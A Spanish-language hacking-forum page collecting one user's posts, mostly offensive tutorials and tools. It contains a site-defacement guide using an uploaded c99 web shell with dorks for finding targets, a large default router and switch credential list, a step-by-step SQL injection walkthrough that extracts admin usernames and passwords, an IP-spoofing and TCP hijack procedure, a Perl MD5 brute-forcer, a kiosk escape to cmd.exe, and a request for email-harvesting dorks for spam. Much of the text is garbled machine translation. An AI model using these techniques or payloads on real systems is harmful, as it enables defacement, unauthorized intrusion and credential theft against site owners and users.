Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - ..::key-m0rt::..

#1
Buenas tardes chicos.., Hace un tiempo tenia una buena base de datos de emails para promocionar alguna de mis webs y el caso es que con el tiempo y la revuelta politica que andamos viviendo en españa deje un poco de lado el hacking.

Como ya sabeis google es un gran aliado a la hora de concretar busquedas y el caso es que google desde españa nos ha restringido mucho las busaquedas y el acceso a muchos foros a los que pertenecia.

me podriais facilitar algunos DORKS para MAILS

Gracias de ante mano un saludos artistas
#2
hola , bueno hoy es domingo dia de resaca asique no apatece realmente  pegar brincos por aii  asique decidi escrbir este tutorial para vosotros .
lo he titulado como defacear un sitio utilizando  una shell c99
es posible que  el av los detecte como virus :S   


bueno una vez tengais la shell c99  vamos a buscar sitios vulnerables  y para eso esta don google

tenemos varias opciones :

inurl : "upload.php"

inurl :  "page = home.html"

inurl: "noticias / id ="

bueno esa es una manera de encontrar un shell c99  xD

Otra forma de búsqueda de sitios vulnerables es encontrar un sitio web que muestra al azaR

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta =

en ese ejemplo subiendo una shell se vereia asi 

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta/geocities.com/noimus13/c99.txt

si su vulnerables vereis esto





^^   ahora vamos a agregar algunas cosas interesantes
lo primero que aremos sera ir al directorio de unicio
cual es ..??

Code:
public_html



O

Code:
httpd.www

Pero public_html se utiliza más


Ahora vamos a navegar hasta el directorio
vale una ves que se pueda ver su index.html
eliminar eso :  si tienes tu propio  index.html entonces esto es lo que harias



bueno y el resto del trabajo es cosa vuestra ... :P
es un tuto bastante simple como veis pero abeces asta lo evidente puede guardar sorpresas

salu2  ;)
#3
Part - 1
___________

Manufacture Product Protocol User ID Password comment

ZyXeL 660HW HTTP admin (none) terra
2wire wifi routers HTTP none Wireless Almost all 2wire routers
3COM CoreBuilder Telnet debug synnet
3COM CoreBuilder Telnet tech tech
3COM HiPerARC Telnet adm (none)
3COM LANplex Telnet debug synnet
3COM LANplex Telnet tech tech
3COM LinkSwitch Telnet tech tech
3COM NetBuilder SNMP ANYCOM
3COM NetBuilder SNMP ILMI
3COM Netbuilder Multi admin (none)
3COM Office Connect ISDN Routers Telnet n/a PASSWORD
3COM SuperStack II Switch Telnet debug synnet
3COM SuperStack II Switch Telnet tech tech
3COM OfficeConnect 812 ADSL Multi adminttd adminttd
3COM Wireless AP Multi admin comcomcom Works on all 3com wireless APs
3COM CellPlex Telnet tech tech
3COM cellplex Telnet admin admin
3COM HiPerARC Telnet adm (none)
3COM LANplex Telnet tech (none)
3COM CellPlex HTTP admin synnet
3COM SuperStack II Switch Telnet tech tech
3COM CellPlex Telnet root (none)
3COM HiPerACT Telnet admin (none)
3COM CellPlex Telnet tech (none)
3COM CellPlex Telnet admin admin
3COM SuperStack 3 Multi admin (none)
3COM SuperStack 3 Multi monitor monitor
3COM SuperStack 3 Multi manager manager
3COM Netbuilder HTTP Root (none) No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
3COM 3C16450 Multi admin (none) telnet or serial
3COM 3C16406 Multi admin (none) telnet or serial
3COM Office Connect ISDN Routers Telnet? n/a PASSWORD
3COM CoreBuilder Telnet n/a admin
3COM CoreBuilder Telnet n/a (none)
3COM OfficeConnect ADSL Wireless 11g Firewall Router HTTP (none) admin No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
3COM OfficeConnect 812 ADSL Multi Administrator admin terra
3Com Internet Firewall HTTP admin password
3Com Shark Fin HTTP User Password 192.160.100.1
3Com 3CRWDR100A-72 HTTP admin 1234admin Provided by No tienes permitido ver los links. Registrarse o Entrar a mi cuenta provider in Spain
3M VOL-0215 etc. SNMP volition volition for Volition fibre switches
3c om 812 HTTP Administrator admin
3com cellplex Telnet operator (none)
3com 3Com SuperStack 3 Switch 3300XM Multi security security
3com superstack II Console 3comcso RIP000 resets all pws to defaults
3com NetBuilder SNMP (none) admin SNMP_READ
3com CellPlex Telnet tech tech
3com super Telnet admin (none)
3com cellplex Multi admin admin RS-232/telnet
3com CellPlex Telnet root (none)
3com Netbuilder Multi admin (none)
3com cellplex Telnet operator (none)
3com OfficeConnect 812 ADSL Multi admin (none)
3com cellplex Multi admin admin
3com HiPerACT Telnet admin (none)
3com 3c16405 Multi n/a (none)
3com 3c16405 Console Administrator (none)
3com Switch Multi admin admin
3com SS III Switch Telnet recovery recovery u need to power off unit. tbl_
3com OfficeConnect Wireless 11g Cable/DSL Gateway HTTP (none) admin
3com 3C16405 Multi admin (none)
3com OfficeConnect 812 ADSL Multi admin (none)
3com cellplex Multi n/a (none)
3com cellplex Multi admin admin
3com HiPerACT Telnet admin (none)
3com 3c16405 Console Administrator (none)
3com CellPlex Telnet tech (none)
3com Switch Multi admin admin
3com SS III Switch Telnet recovery recovery u need to power off unit. tbl_
3com OfficeConnect Wireless 11g Cable/DSL Gateway HTTP (none) admin
3com 3CRADSL72 Multi (none) 1234admin snmp open by default with public / private community
3com CB9000 / 4007 Console Type User: FORCE (none) This will recover a lost password and reset the switch config to Factory Default
3com officeconnect Multi n/a (none)
3com superstack II Netbuilder Multi n/a (none)
3com officeconnect Multi admin (none)
3com office connect Multi admin (none)
3com LANplex Telnet n/a admin
3ware 3DM HTTP Administrator 3ware
ACCTON Wirelessrouter HTTP none 0 YEAHH
ADC Kentrox Pacesetter Router Telnet n/a secret
ADIC Scalar 100/1000 HTTP admin secure
ADIC Scalar i2000 Multi admin password
ALCATEL 4400 Console mtcl (none)
ALLNET T-DSL Modem HTTP admin admin
AMBIT ADSL Telnet root (none)
AOC zenworks 4.0 Multi n/a admin
APC 9606 Smart Slot Telnet n/a backdoor
APC USV Network Management Card SNMP n/a TENmanUFactOryPOWER nachzulesen unter No tienes permitido ver los links. Registrarse o Entrar a mi cuenta gruss HonkHase
APC UPSes (Web/SNMP Mgmt Card) HTTP device device Secondary access account (next to apc/apc)
APC Smart UPS Multi apc apc
ARtem ComPoint - CPD-XT-b Telnet (none) admin
ASMAX AR701u / ASMAX AR6024 HTTP admin epicrouter
ASMAX AR800C2 HTTP admin epicrouter
ASMAX AR800C2 HTTP admin epicrouter
ASUS WL-500G HTTP admin admin
ASUS ASUS WL-330 Pocket Wireless Access Point HTTP admin admin No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
ASUS ASUS SMTA Router HTTP + Telnet admin admin Router / VoIP Gateway (@ 192.168.3.1)
ATL P1000 Multi operator 1234 Tape Library Operator Access
ATL P1000 Multi Service 5678 Tape Library Service Access
AVAYA g3R Console root ROOT500
AVAYA Cajun P33x SNMP n/a admin check the Bugtraq archives for more information
AVAYA P333 Telnet Administrator ggdaseuaimhrke
AVAYA P333 Telnet root ggdaseuaimhrke
AXUS AXUS YOTTA Multi n/a 0 Storage DAS SATA to SCSI/FC
Accelerated Networks DSL CPE and DSLAM Telnet sysadm anicust
Aceex Modem ADSL Router HTTP admin (none)
Aceex Modem ADSL Router HTTP admin (none)
Actiontec Wireless Broadband Router Multi admin password Verizon Fios Setup
Addon GWAR3000/ARM8100 HTTP admin admin No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Advantek Networks Wireless LAN 802.11 g/b Multi admin (none) No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Aethra Starbridge EU HTTP admin password
AirTies RT-210 AirTies RT-210 Telnet admin admin AirTies RT-210
Alcatel PBX Port 2533 kermit kermit thanks to Nicolas Gregoire
Alcatel PBX Port 2533 dhs3mt dhs3mt thanks to Nicolas Gregoire
Alcatel PBX Port 2533 at4400 at4400 thanks to Nicolas Gregoire
Alcatel PBX Port 2533 mtch mtch thanks to Nicolas Gregoire
Alcatel PBX Port 2533 mtcl mtcl thanks to Nicolas Gregoire
Alcatel PBX Port 2533 root letacla thanks to Nicolas Gregoire
Alcatel PBX Port 2533 dhs3pms dhs3pms thanks to Nicolas Gregoire
Alcatel PBX Port 2533 adfexc adfexc thanks to Nicolas Gregoire
Alcatel PBX Port 2533 client client
Alcatel PBX Port 2533 install llatsni thanks to Nicolas Gregoire
Alcatel PBX Port 2533 halt tlah thanks to Nicolas Gregoire
Alcatel Office 4200 Multi n/a 1064 by Bazille
Alcatel OmniStack 6024 Telnet admin switch
Alcatel Omnistack/Omniswitch Telnet/Console diag switch
Alcatel Omnistack/omniswitch Telnet diag switch
Alcatel Timestep VPN 1520 Permit config and console root permit Perm/Config port 38036
Alcatel OXO Multi (none) admin
Alcatel OmniPCX Office FTP ftp_inst pbxk1064
Alcatel OmniPCX Office FTP ftp_admi kilo1987
Alcatel OmniPCX Office FTP ftp_oper help1954
Alcatel OmniPCX Office FTP ftp_nmc tuxalize
Alcatel 7300 ASAM TL1 SUPERUSER ANS#150
Allied Telesyn Multi manager friend
Allied Telesyn AT-8024(GB) Console n/a admin
Allied Telesyn AT-8024(GB) HTTP manager admin
Allied Telesyn AT Router HTTP root (none)
Allied Telesyn ALAT8326GB Multi manager manager
Allied Telesyn AT8016F Console manager friend
Allied Telesyn AT-AR130 (U) -10 HTTP Manager friend Default IP is 192.168.242.242
Allnet ALL0275 802.11g AP HTTP none admin
Alteon ACEDirector3 console admin (none)
Alteon ACEswitch HTTP admin admin
Alteon ACEswitch Telnet admin (none)
Alteon ACEswitch HTTP admin linga none
Alteon AD4 Console admin admin Factory default
Ambit Cable Modem 60678eu Multi root root
Ambit Cable Modem Multi root root Time Warner Cable issued modem
Ambit ntl:home 200 HTTP root root This is the cable modem supplied by NTL in the UK
Amitech wireless router and access point 802.11g 802.11b HTTP admin admin Web interface is on 192.168.1.254 available on the LAN ports of the AP.
Andover Controls Infinity Console acc acc Building managment system
Apache Tomcat Web Server Administration Tool HTTP admin (none)
Apple AirPort Base Station (Graphite) Multi (none) public See Apple article number 58613 for details
#4
Hola , aqui les dejo un script que ojala les guste y tengan el gesto de decir " gracias "

este script realiza lo siguiente :

* Comprueba si se  permiten sesiones anónimas.
* Comprueba si el servidor FTP detectado ejecuta Microsoft ftpd.
* Comprueba si el comando MKDIR está permitido (esto parece ser requerido por el exploit)


Si todas estas condiciones se cumplen, el script finaliza con un mensaje de advertencia. tener  en cuenta que mi script sólo informará de  servidores que podrían ser vulnerables. Por otro lado, se ejecuta un servidor con un usuario anónimo capaz de crear directorios es una violación de seguridad importante que debe ser fijado con independencia de la vulnerabilidad recién descubierta , quedo calro ? para que luego no digais que no explico     xDDDD

bueno y p ara utilizar la secuencia de comandos de Nmap, copiarlo en su repositoty script local (algo así como / usr / local / share / nmap / scripts /) y reconstruir su índice de secuencias de comandos:

codigo :
Código: php
# nmap --script-updatedb


luego, el script se ejecuta en todos los servidores FTP detectados (utilizando la opción "-Sc" el argumento) o se puede especificar sólo una secuencia de comandos a ejecutar (para la velocidad y tal )  :

codigo: 
Código: php
# nmap -p 21 -sV --script=IIS-FTP 10.0.0.7

Starting Nmap 4.76 ( http://nmap.org ) at 2009-09-01 01:15 CEST
Interesting ports on test-win (10.0.0.7):
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
|_ IIS FTP: IIS Server allow anonymous and mkdir (potentially vulnerable)
Service Info: OS: Windows


y el script es el siguente:

Código: php
--- Checks if a Microsoft FTP server allows anonymous logins + MKDIR
--- If yes, could be vulnerable to the following exploit:
--- http://seclists.org/fulldisclosure/2009/Aug/0443.html
-- @output
-- |_ FTP: IIS Server allow anonymous and mkdir (potentially vulnerable)
--
-- @args ftpuser Alternate user to initiate the FTP session
--       ftppass Alternate password to initiate the FTP session
--       If no arguments are passed, anonymous FTP session is probed

id="IIS FTP"
description="Checks to see if a Microsoft ISS FTP server allows anonymous logins and MKDIR (based on anonftp.nse by team I.S.W  <[email protected]>)"
author = "sharon,keymort  <UNIVERSIDAD COMPUTENSE DE MADRID>"
license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
categories = {"default", "auth", "intrusive"}

require "shortport"
local stdnse = require "stdnse"
---
-- portrule = shortport.port_or_service(21, "ftp")
portrule = function(host,port)
if (port.number == 21 and
    (port.state == "open" or port.state == "open|filtered"))
then
return true
else
return false
end
end

---
-- Connects to the ftp server and checks if the server allows
-- anonymous logins or any credentials passed as arguments
action = function(host, port)
local socket = nmap.new_socket()
local result
local status = true
local isAnon = false

local err_catch = function()
socket:close()
end

local try = nmap.new_try(err_catch())

socket:set_timeout(5000)
try(socket:connect(host.ip, port.number, port.protocol))

if (type(nmap.registry.args.ftpuser) == "string" and nmap.registry.args.ftpuser ~= "" and
    type(nmap.registry.args.ftppass) == "string" and nmap.registry.args.ftppass ~= "")
then
local struser = "USER " .. nmap.registry.args.ftpuser .. "\r\n"
local strpass = "PASS " .. nmap.registry.args.ftppass .. "\r\n"
try(socket:send(struser))
try(socket:send(strpass))
else
try(socket:send("USER anonymous\r\n"))
try(socket:send("PASS IEUser@\r\n"))
end

        while status do
status, result = socket:receive_lines(1);
if string.match(result, "^230") then
try(socket:send("RSTATUS\r\n"))
while status do
status, result = socket:receive_lines(1);
if string.match(result, "^211-Microsoft FTP Service") then
try(socket:send("MKD w00t\r\n"))
while status do
status, result = socket:receive_lines(1);
if string.match(result, "^257") then
isVuln=true
try(socket:send("RMDIR w00t\r\n"))
break;
end
end
end
end
end
end

socket:close()

if(isVuln) then
return "IIS Server allow anonymous and mkdir (potentially vulnerable)"
end
end




#5
Hola chicos aquí voy a explicar el proceso actual en el ataque de suplantación de IP ... las medidas reales de participación en la falsificación de direcciones IP es muy difícil no imposible ..... aquí el paso a paso por el guía de IP Spoofing.

suplantación de IP:
IP spoofing es sobre el ataque más avanzada que puede ser ejecutado en un sistema informático. IP spoofing, si se hace correctamente, es uno de los más suaves y más difíciles los ataques en Internet. Pero los ataques de suplantación de IP son en realidad muy complicado.
   
IP spoofing ocurre cuando un atacante trucos o faroles el sistema de destino en la creencia de que los paquetes de datos que se envían a ellos partieron de una fuente distinta del sistema de origen real. En otras palabras, es un proceso que permite al atacante para ocultar su verdadera identidad cuando se comunica con el sistema de destino, por lo tanto, los paquetes de datos que el atacante envía aparecerá originan en otro sistema.

Por ejemplo, suponga que su dirección IP es 192.168. 192,28, y la dirección IP del sistema de destino es 202.14.12.1. Normalmente, cuando se envía un mensaje al sistema de destino, que el sistema detecta la dirección IP de su sistema, 192.168.192.28. Cuando se utiliza IP spoofing, sin embargo, su dirección IP se sustituye con una dirección IP falsa, por lo que es bastante difícil para el sistema de destino para rastrear usted.

Por ejemplo, imaginemos que las siguientes tres direcciones sistema existen
:
1. Ataque: 111.11.11.11 ( REAL)
2. Víctima: 222.22.22.22 (VÍCTIMA)
3. Falso: 33.33.33.33 (FAKE)

Normalmente, si el Real fuera a enviar paquetes de datos en el sistema víctima, la dirección de la fuente de estos paquetes se muestran claramente que el Real Madrid les ha enviado . Sin embargo, con el uso de IP Spoofing REAL enviar los paquetes de datos a VÍCTIMA de tal manera que ellos parecen haber sido enviados desde el falso sistema. Falsificación de IP, como se puede ver, es una manera de disfrazar de ocultar la dirección de origen del atacante. Se utiliza para llevar a cabo una variedad de ataques.

PROBLEMAS CON IP Spoofing:

• FAKE debe existir y debe estar conectado a Internet
• falsos no debe en ningún momento responder a la SYN / ACK de paquetes que VICITIM le envía.
• Si usted es la explotación de una relación de confianza, entonces falso debe ser elegido de tal manera que la Víctima y falsos tienen una relación de confianza entre sí.


Antes de pasar a un paso a paso guía a la suplantación IP, hay dos conceptos básicos de red debe comprender:

1 . Números Seuence
2. Las relaciones de confianza

números de secuencia:
Cada vez que los datos se envían a través de Internet a través de una conexión TCP / IP, que se divide en fragmentos en el sistema de origen y vuelto a montar en el sistema de destino. Cada paquete contiene un fragmento de datos que contiene un número de secuencia, que, junto con los valores en el campo del paquete de offset, es utilizado por el sistema de destino para volver a unir los paquetes de datos en el orden correcto. Un número de secuencia es un número de 32 bits que pueden ir de 1 a 4.294.967.295
               
Cada vez que un sistema es arrancado, se le asigna un número de secuencia inicial (ISN), 1. de este número de secuencia inicial se incrementa en 128.000 cada segundo y, además, con todas las conexiones establecidas, se incrementa en 64.000. Por ejemplo, si una serie tiene un ISN de 187737287, a continuación, después de 3 conexiones y dos segundos su ISN serán 1898185287 ---- es decir, 1897737287 + (3 * 64.000) + (2 * 128 000).
Además, el ISN se incrementa en 1 cada vez que ciertos tipos de paquetes de datos que se envían desde el sistema. Por ejemplo, cuando un sistema envía un paquete SYN a otro sistema, el campo número de secuencia en el primer paquete será igual a 1 más ISN del sistema de origen en el momento exacto del paquete es enviado por el paquete SYN flag consume el 1 número de secuencia.

ISN Incrementos
Incremento de los casos
------------------------------------------------ -------------------------------------------------- -------------------------------------------------- ---------------
transferencia de paquetes FIN 1
Transferencia de paquetes SYN 1
Transferencia de paquete ACK 0
Transferencia de SYN / ACK 1 paquete
de transferencia de FIN / paquete SCK 1
pasaje de 1 segundo 1 / 28000
Establecimiento de 1 conexión de 64.000
--------------------------------------------- -------------------------------------------------- -------------------------------------------------- ------------------ Si un hacker aprende el arte de predecir los números de secuencia, él o ella puede hacer fácilmente las conexiones TCP secuestrar y desviar los datos y las relaciones de confianza Exploit.


Además de los los números de secuencia, los paquetes de datos también contienen números de acuse de recibo. Un ACKnumbers actúa exactamente como una secuencia de números, esperan que representa el número de secuencia del paquete que el sistema de destino espera recibir a continuación. También reconoce que todos los paquetes de datos con números de secuencia más bajo que el valor en el campo número de confirmación han sido recibidas.

Buques relación de confianza:

Toda vez que se conecta a un sistema, te vas a encontrar algún tipo de proceso de autenticación. En la mayoría de los casos, este es el nombre de usuario familiar / contraseña, que desafía al usuario que introduzca el nombre de usuario y la contraseña correctos antes de que se garantizará el acceso. Hay, sin embargo, sin embargo, otra forma de autenticación: relaciones de confianza. Cuando un cliente tiene una relación de confianza con un host remoto, entonces la dirección IP del cliente en sí sirve para autentificar que el cliente cuando se inicia una conexión con el host remoto
Estos tipos de buques relación de confianza son comunes en los sistemas UNIX, que tienen ciertos servicios de R "tales como rsh, rlogin, rcp, etc ----



pasos reales involucrados en falsificación de direcciones IP:
                   
       La detección de un sistema de confianza:
El primer paso en la utilización de una relación de confianza para explotar el sistema objetivo es encontrar un sistema que goza de una VICITIM relación de confianza. Usted puede encontrar un sistema con el que VÍCTIMA establece una relación de confianza mediante el uso de cualquiera de los siguientes métodos:
1. El uso de varios comandos útiles como rpcinfo-p y showmount-e
2. Excavando mayor cantidad de información acerca de víctima y la red en la que reside como sea posible
3. Uso de la fuerza bruta, en la que comprobar todos los sistemas en la misma red para ver si alguno es capaz de establecer una relación de confianza con la víctima

Entonces atacante debe determinar el valor ISN de la víctima. Para ello atacante se conecta al puerto 23 o el puerto 25 de la víctima, con la ayuda de snifferlog determinar el ISN de VÍCTIMAS
Además, el atacante debe deducir del paquete RTT utilizando una utilidad llamada icmptime.

Almorzar el ataque real:
Suponiendo que ha logrado predecir ISN de la víctima, es el almuerzo del ataque de la siguiente manera:
1. atacante envía un paquete SYN con la dirección IP falso a la víctima. Este paquete SYN está dirigida a rlogin puerto (513) y solicita que la conexión se establezca la confianza entre la víctima y de confianza.
2. VÍCTIMA respuestas a este paquete con un paquete SYN / ACK SYN dirigida confianza. Porque de confianza ha sido desactivado, su memoria monopolizado por un ataque de inundación SYN-, no puede reproducir este SYN / ACK de paquetes enviados por la víctima, se desecha.
3. Cuando esté seguro de gases de transcurrido el tiempo suficiente que la víctima debe haber enviado un SYN / paquete ACK con el sistema de confianza, envíe un mensaje de ACK a la víctima. Este msg ACK está diseñado para aparecer como a través de él ha venido de confianza y incluye un número de ACK cuyo valor es el número de secuencia previsto más 1.

Si todo va según lo previsto, a continuación, víctima de aceptar la conexión y una relación de confianza entre la víctima y atacante se establezcan.

creditos : team I.S.W  ( ERiK0S, Sucramoto , keym0rt , sharon , pìer )

                                                                             AGRADEZCAN ES GRATIS!!!
#6
Hola, bueno el titulo mismo del post lo dice un script en perl para un brute force ...
espero que les guste , comenten sus opiñones o como se podria mejorar .

                        **********************************************
                        *           MD5CKRACKER script [perl] par *..::Key-m0rt::..*  *
                        **********************************************

GODIGO :

Código: perl
#!/usr/bin/perl
#   md5crack.pl
#  Usage:
#  ./md5crack <charset> <mincount> <maxcount> <yourMD5>
#  nUm/b0
#  Ècrit par *..::Key-M0rt::..* tam I.S.W

$ver = "01";
$dbgtmr = "1"; #Intervall of showing the current speed + lastpassword in seconds.

if ($dbgtmr<=0){ die "Set dbgtmr to a value >=1 !\n";};
use Digest::MD5 qw(md5_hex);
use Time::HiRes qw(gettimeofday);

if ($ARGV[0]=~"a") {
$alpha = "abcdefghijklmnopqrstuvwxyz";}
if ($ARGV[0]=~"A") {
$alpha = $alpha. "ABCDEFGHIJKLMNOPQRSTUVWXYZ";}
if ($ARGV[0]=~"d") {
$alpha = $alpha."1234567890";}
if ($ARGV[0]=~"x") {
$alpha = $alpha. "!\"\$%&/()=?-.:\\*'-_:.;,";}

if ($alpha eq "" or $ARGV[3] eq "") {usage();};
if (length($ARGV[3]) != 32) { die "Désolé, mais il Semble que le MD5 est pas valide!\n";};

print "Selected charset for attack: '$alpha\'\n";
print "Going to Crack '$ARGV[3]'...\n";

for (my $t=$ARGV[1];$t<=$ARGV[2];$t++){
crack ($t);
}

sub usage{
print "\n\nMD5 Hash Bruteforce Kit v_$ver\n";
print "by unix_chro alias backtrack ([email protected])\n";
print "Member in staff leader:elite-members,ubuntu-hackers\n\n";
print "USAGE\n";
print "./md5crack <charset> <mincount> <maxcount> <yourMD5>\n";
print " Charset can be: [aAdx]\n";
print " a = {'a','b','c',...}\n";
print " A = {'A','B','C',...}\n";
print " d = {'1','2','3',...}\n";
print " x = {'!','\"',' ',...}\n";
print "EXAMPLE FOR CRACKING A MD5 HASH\n";
print "./md5crack.pl ad 1 3 900150983cd24fb0d6963f7d28e17f72\n";
print " This example tries to crack the given MD5 with all lowercase Alphas and all digits.\n";
print " MD5 Kit only tries combinations with a length from 1 and 3 characters.\n-------\n";
print "./md5crack.pl aA 3 3 900150983cd24fb0d6963f7d28e17f72\n";
print " This example tries to crack the given MD5 with all lowercase Alphas and all uppercase Alphas.\n";
print " MD5 Kit only tries passwords which length is exactly 3 characters.\n-------\n";
print "./md5crack.pl aAdx 1 10 900150983cd24fb0d6963f7d28e17f72\n";
print " This example tries to crack the given MD5 with nearly every character.\n";
print " MD5 Kit only tries combinations with a length from 1 to 10 characters.\n";
die "Quitting...\n";
}

sub crack{
$CharSet = shift;
@RawString = ();
for (my $i =0;$i<$CharSet;$i++){ $RawString = 0;}
$Start = gettimeofday();
do{
for (my $i =0;$i<$CharSet;$i++){
if ($RawString[$i] > length($alpha)-1){
if ($i==$CharSet-1){
print "Bruteforcing done with $CharSet Chars. No Results.\n";
$cnt=0;
return false;
}
$RawString[$i+1]++;
$RawString[$i]=0;
}
}
################################################## #
$ret = "";
for (my $i =0;$i<$CharSet;$i++){ $ret = $ret . substr($alpha,$RawString[$i],1);}
$hash = md5_hex($ret);
$cnt++;
$Stop = gettimeofday();
if ($Stop-$Start>$dbgtmr){
$cnt = int($cnt/$dbgtmr);
print "$cnt hashes\\second.\tLast Pass '$ret\'\n";
$cnt=0;
$Start = gettimeofday();
}
print "$ARGV[3] != $hash ($ret)\n";
if ($ARGV[3] eq $hash){
die "\n**** Password Cracked! => $ret\n";
}
################################################## #
#checkhash($CharSet)."\n";

$RawString[0]++;
}while($RawString[$CharSet-1]<length($alpha));
}

sub checkhash{
$CharSet = shift;
$ret = "";
for (my $i =0;$i<$CharSet;$i++){ $ret = $ret . substr($alpha,$RawString[$i],1);}
$hash = md5_hex($ret);
$cnt++;
$Stop = gettimeofday();
if ($Stop-$Start>$dbgtmr){
$cnt = int($cnt/$dbgtmr);
print "$cnt hashes\\second.\tLast Pass '$ret\'\n";
$cnt=0;
$Start = gettimeofday();
}

if ($ARGV[3] eq $hash){
die "\n**** Password Cracked! => $ret\n";
}

}
#7
hola , bueno esto me parece muy basico asta para hacking basico pero supongo que puede serle util a aquellos newbies que les guste jugar en los ordenadores de los cibers  :o


1 .- Abrir la calculadora y haga clic en Ayuda> Temas de Ayuda. Cuando se abre la ventana de ayuda al lado de donde dice '(arriba calculadora' esquina superior izquierda) hay una '? Jump 'símbolo, haga clic derecho sobre él y seleccione la URL y ésta,

file: / / / C: / windows/system32/cmd.exe

y luego haga clic en Abrir.  el CMD se abre automáticamente.
Si la calculadora está bloqueado, puede hacer lo mismo en cualquiera de los juegos de Windows XP;
- Free Cell.
- Corazones.
- Backgammon en Internet.
- "Damas.
-" Corazones.
- "" Reversi.
- "" Espadas.
- Solitaire.
- Pinball.
- Buscaminas.
- Spider Solitaire.

He probado en todos ellos y funciona. Pero repito,

el administrador de su PODRÍA ser conscientes de ello y puede que NO FUNCIONE (no se trata de gritar a nadie sólo que sea más claro)

2 .- Usando el mismo texto que el anterior; file: / / / C: / windows / system32/cmd.exe
Puede abrir Excel y crear un hipervínculo con el texto de la presente, haga clic en Aceptar y, a continuación, haga clic en el vínculo de la celda de Excel. Haga clic en Aceptar en ambas ventanas que aparecerá y el símbolo del sistema se abrirá.
Esto lo único que funciona con Microsoft Office, tengo la prueba con openoffice y no funciona

estas son solo algunas de las maneras de abrirlo :S   espero que le sea de ayuda a alguien
#8
                    ***************************************************************
                   *  SQLI tutorial pour débutants ecrite par *..::Key-m0rt::..*     *         
                   ****************************************************************

bueno aqui les traigo un pequeño tutorial de sqli  para newbies ( principiantes ) espero que les guste no olvien agradecer , es gratis :P

===========
= Primer  paso: =
===========

Buscar destino
Por ejemplo: [sitio] / berita.php? id = 100

Añadir los personajes al final de la URL, o agregar el carácter "-" (sin las ") para ver si hay un mensaje de error.
ejemplo:

[sitio] / berita.php? id = 100 'o
[sitio] / berita.php? id =- 100

==========
= El segundo paso: =
==========

encontrar y contar el número de tablas disponibles en la base de datos ...
use el comando: Ordenar por:

ejemplo:
CÓDIGO: Todos Select
[sitio] / berita.php? ID 100 =- + para + por +1- - o
[sitio] / berita.php? ID 100 =- + para + de 1 / *

paso a paso (satupersatu) ...
ejemplo:
CÓDIGO: Todos Select
[sitio] / berita.php? ID 100 =- + para + de +1- --
[sitio] / berita.php? ID 100 =- + para + por +2- --
[sitio] / berita.php? ID 100 =- + para + por +3- --
[sitio] / berita.php? ID 100 =- + para + por +4- --

por lo tanto, el error o mensaje de error de ...
Por ejemplo: [sitio] / berita.php? ID 100 =- + para + por +9- --

significa que tomamos es hasta el número 8
se convierte en [sitio] / berita.php? ID 100 =- + para + por +8- --


===========
= El tercer paso: =
===========

para averiguar cómo utilizar la Unión parece
debido a este error hasta el número 9
a continuación: [sitio] / berita.php? ID 100 =- + Unión + +1,2,3,4,5,6,7,8 seleccione --

ok escribió los números es como el 5

utilizar la versión () o @ @ version para comprobar la versión de diapakai entrada de comandos SQL escribió sobre TSB nagka escribió el último en salir
Por ejemplo: [sitio] / berita.php? ID 100 =- + Unión + +1,2,3,4 seleccionar, version (), 6,7,8 - o
[sitio] / berita.php? ID 100 =- + Unión + +1,2,3,4 seleccionar, @ @ version, 6,7,8 --

Ver la versión utilizada es como YG 4 versiones dejan ver porque en este 4 que teníamos que adivinar su propia columna de la tabla n imaginable en la red porque no pueden usar el comando + De INFORMATION_SCHEMA ..

de la versión 5 significa que tienen la suerte de no tener que adivinar la columna de la tabla n Ver Ver como 4 porque el 5 era capaz de utilizar el comando de + INFORMATION_SCHEMA ..


===========
= cuarto paso : =
===========

para mostrar todo el contenido de la tabla que se está
GROUP_CONCAT comando (TABLE_NAME)>>> incluido en las cifras a la última respuesta
Comando + de + INFORMATION_SCHEMA.TABLES + + = donde table_schema base de datos ()>>> inserta a continuación del último número de

CÓDIGO: Todos Select
[sitio] / berita.php? ID 100 =- + Unión + +1,2,3,4 seleccionar, GROUP_CONCAT (TABLE_NAME), 6,7,8 + de + en + + INFORMATION_SCHEMA.TABLES TABLE_SCHEMA = base de datos () -- --

=============
= quinto paso : =
=============

GROUP_CONCAT comando (column_name)>>> incluido en las cifras a la última respuesta
Comando + de + + + donde INFORMATION_SCHEMA.COLUMNS table_name = 0xhexa ->>> inserta a continuación del último número de

CÓDIGO: Todos Select
[sitio] / berita.php? ID 100 =- + Unión + +1,2,3,4 seleccionar, GROUP_CONCAT (column_name), 6,7,8 + de + + + donde INFORMATION_SCHEMA.COLUMNS table_name = 0xhexa --

en esta etapa debe mengextrak palabra sobre el contenido de la tabla para convertir hexadecimal de esta manera
YG sitio web se utiliza para la conversión:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

ejemplo de palabras de compasión en la conversión de la administración se 61646D696E

CÓDIGO: Todos Select
[sitio] / berita.php? ID 100 =- + Unión + +1,2,3,4 seleccionar, GROUP_CONCAT (column_name), 6,7,8 + de + + + donde INFORMATION_SCHEMA.COLUMNS table_name = 0x61646D696E --

============
= Sexto Paso : =
============

ayer dio lugar a lo que ha sido excluido de la tabla que es la forma

CONCAT_WS comando (0x3a, la columna de contenidos respuesta emitida)>>> incluido en las cifras a la última respuesta
Comando + de + (nombre derivado de la mesa)>>> inserta a continuación del último número de

CÓDIGO: Todos Select
[sitio] / berita.php? ID 100 =- + Unión + Seleccionar +1,2,3,4, CONCAT_WS (0x3a, el contenido de la columna), 6,7,8 + de + (nombre de la tabla derivados) --

ejemplos de palabras que salió fue el de identificación, nombre de usuario, contraseña

CÓDIGO: Todos Select
[sitio] / berita.php? ID 100 =- + Unión + Seleccionar +1,2,3,4, CONCAT_WS (0x3a, id, nombre de usuario, contraseña), 6,7,8 + de + admin --

==============
= Septimo paso : =
==============

etapa final para admin patio o inicio de sesión.

un saludo , agradezcan c'est gratuit   *..:: key-m0rt::..*
           
#9
                     *****************************************************
                     *     tutoriel pour augmenter la vitesse du modem. écrit par keymort   *
